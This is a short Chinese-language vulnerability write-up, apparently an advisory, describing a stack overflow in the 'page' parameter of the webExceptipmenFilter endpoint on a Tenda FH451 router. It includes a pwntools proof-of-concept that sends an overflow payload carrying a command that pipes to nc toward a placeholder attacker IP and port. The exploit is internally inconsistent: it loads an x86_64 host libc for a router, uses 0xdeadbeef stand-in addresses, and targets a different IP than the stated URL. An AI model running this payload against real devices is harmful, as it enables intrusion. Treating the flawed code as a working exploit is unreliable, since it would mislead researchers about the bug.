### 关键信息总结 #### 漏洞概述 - **漏洞类型**: 远程代码执行 (RCE) - **受影响设备**: Shenzhen Jixiang Tengda Technology Co., Ltd. FH451 路由器 - **漏洞URL**: `http://192.168.100.157:80/goform/webExceptipmenFilter` #### 漏洞分析 - **关键函数**: `webExceptipmenFilter` - **问题点**: 在处理 `page` 参数时,未进行长度检查,导致缓冲区溢出。 - **具体代码片段**: ```c v3 = webGetVar(s, "page", &unk_81E0B3); sub_39A4C("filter.webexcept.en", 126); v6 = webGetVar(s, "ipflag", &unk_81E0B3); Setvalue("ipgroup_flag", v6); strcpy(v3, "add"); ``` - **影响**: 当 `page` 参数值过长时,会导致栈溢出,可能引发程序崩溃或远程代码执行。 #### 复现步骤 - **请求示例**: ```python import requests from pwn import * libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") system_offset = libc.symbols["system"] base = 0x60000000 cmd = b"echo REVERSECONNECTIONHERE|nc REVERSECONNECTIONIP REVERSECONNECTIONPORT" move_r0 = base + 0xdeadbeef r_cmd = base + 0xdeadbeef url = "http://192.168.100.156:80/goform/webExceptipmenFilter" payload = {"page": cyclic(1024) + p32(r_cmd) + p32(move_r0) + cmd} res = requests.post(url, data=payload) ``` #### 测试结果 - **截图显示**: 发送构造的恶意请求后,目标设备出现连接失败和核心转储(Segmentation Fault),表明成功触发了漏洞。 #### 总结 该漏洞存在于 `webExceptipmenFilter` 函数中对 `page` 参数的处理不当,通过构造特定的请求可以触发栈溢出,进而实现远程代码执行。攻击者可以利用此漏洞在目标设备上执行任意命令。